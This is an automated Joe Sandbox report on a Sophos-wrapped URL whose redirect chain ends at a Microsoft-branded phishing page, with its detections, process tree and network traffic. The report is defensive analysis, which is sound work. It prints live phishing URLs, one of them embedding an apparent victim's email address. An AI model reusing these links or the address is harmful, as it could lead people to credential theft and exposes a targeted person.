Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3

Overview

General Information

Sample URL:	https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC
Analysis ID:	1431603

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish10

HTML page contains suspicious base64 encoded javascript

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 7072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3JhZ2UuZ29vZ2xlYXBpcy5jb20lMjUyNTJGdjAlMjUyNTJGYiUyNTI1MkZteS1hd2Vzb21lLXByb2plY3QtaWQtMzU4ODkuYXBwc3BvdC5jb20lMjUyNTJGbyUyNTI1MkZzb3NmcmUuaHRtbCUyNTI1M0ZhbHQlMjUyNTNEbWVkaWElMjUyNTI2dG9rZW4lMjUyNTNENzBmZDlmZWMtZWM4Mi00YjQ1LTkwMmQtMmFhM2Q3NTgwYzNiJTI2dXN0JTNEMTcxNDEyMzE0MDAwMDAwMCUyNnVzZyUzREFPdlZhdzJ5SzhVRkpvWmVuUkRWdUJMLXNmY20lMjZobCUzRGVuJTI2c291cmNlJTNEZ21haWwjYTJ4MVkyRnpRR04wYlhOdmFHbHZMbU52YlE9PQ==&p=m&i=NjFjOWM1NjJmM2YxNmYxMDA2OTJjYWZj&t=THJkcUUxZW9PQzAvNFZ0aWxoalJFOStYQ0dWVXgvYjJ6aS82eTZoUDhJcz0=&h=276fada438bf49c2be0403c28d11d4f4&s=AVNPUEhUT0NFTkNSWVBUSVZ-gOCnEu8L0hbaTxie_PLqb02g0uIV3TDGiGYGiGwGbDIPB11limBksw9z8tTzOiKEbBHGOtpfybJD4FbJxpna6swSu6rycA6MG9n6CTc4aMLN4lGfbapv3cHB_2jaSF4 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1820,i,10330471248746853463,16318652656842853927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
3.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish10

Source: Yara match

File source: 3.4.pages.csv, type: HTML

HTML page contains suspicious base64 encoded javascript

Source: https://yjg0.eaketury.com/WnXlOu/#Mklucas@ctmsohio.com

HTTP Parser: Base64 decoded: <script>

Phishing site detected (based on image similarity)

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: Number of links: 0

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://yjg0.eaketury.com/WnXlOu/#Mklucas@ctmsohio.com

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: Title: DhmeODtkHo does not match URL

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI	HTTP Parser: Invalid link: Terms of use
Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI	HTTP Parser: Invalid link: Privacy & cookies

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: <input type="password" .../> found

Source: https://yjg0.eaketury.com/WnXlOu/#Mklucas@ctmsohio.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/7sl6k/0x4AAAAAAAXoUC7gmK_gV_CI/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/7sl6k/0x4AAAAAAAXoUC7gmK_gV_CI/auto/normal	HTTP Parser: No favicon
Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI	HTTP Parser: No favicon

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: No <meta name="author".. found

Source: https://yjg0.eaketury.com/480549295045325RMvhKcExnOQHTGXOZECITFPTMLZCBEXCQPHPQTIAFJQPDSPYSPI?KQJMVQADPADFDLFSGWGKDGpmBBHEWLIDBCJBRFJQEOMUKSXJVGNRSHMCTNATUSRWJEMIIOLRMZYKI

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49790 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183

Source: global traffic	DNS traffic detected: DNS query: us-west-2.protection.sophos.com
Source: global traffic	DNS traffic detected: DNS query: google.co.za
Source: global traffic	DNS traffic detected: DNS query: www.google.co.za
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: emailing.mirabaud-am.com
Source: global traffic	DNS traffic detected: DNS query: yjg0.eaketury.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49790 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.win@20/40@30/214

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3JhZ2UuZ29vZ2xlYXBpcy5jb20lMjUyNTJGdjAlMjUyNTJGYiUyNTI1MkZteS1hd2Vzb21lLXByb2plY3QtaWQtMzU4ODkuYXBwc3BvdC5jb20lMjUyNTJGbyUyNTI1MkZzb3NmcmUuaHRtbCUyNTI1M0ZhbHQlMjUyNTNEbWVkaWElMjUyNTI2dG9rZW4lMjUyNTNENzBmZDlmZWMtZWM4Mi00YjQ1LTkwMmQtMmFhM2Q3NTgwYzNiJTI2dXN0JTNEMTcxNDEyMzE0MDAwMDAwMCUyNnVzZyUzREFPdlZhdzJ5SzhVRkpvWmVuUkRWdUJMLXNmY20lMjZobCUzRGVuJTI2c291cmNlJTNEZ21haWwjYTJ4MVkyRnpRR04wYlhOdmFHbHZMbU52YlE9PQ==&p=m&i=NjFjOWM1NjJmM2YxNmYxMDA2OTJjYWZj&t=THJkcUUxZW9PQzAvNFZ0aWxoalJFOStYQ0dWVXgvYjJ6aS82eTZoUDhJcz0=&h=276fada438bf49c2be0403c28d11d4f4&s=AVNPUEhUT0NFTkNSWVBUSVZ-gOCnEu8L0hbaTxie_PLqb02g0uIV3TDGiGYGiGwGbDIPB11limBksw9z8tTzOiKEbBHGOtpfybJD4FbJxpna6swSu6rycA6MG9n6CTc4aMLN4lGfbapv3cHB_2jaSF4
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1820,i,10330471248746853463,16318652656842853927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1820,i,10330471248746853463,16318652656842853927,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
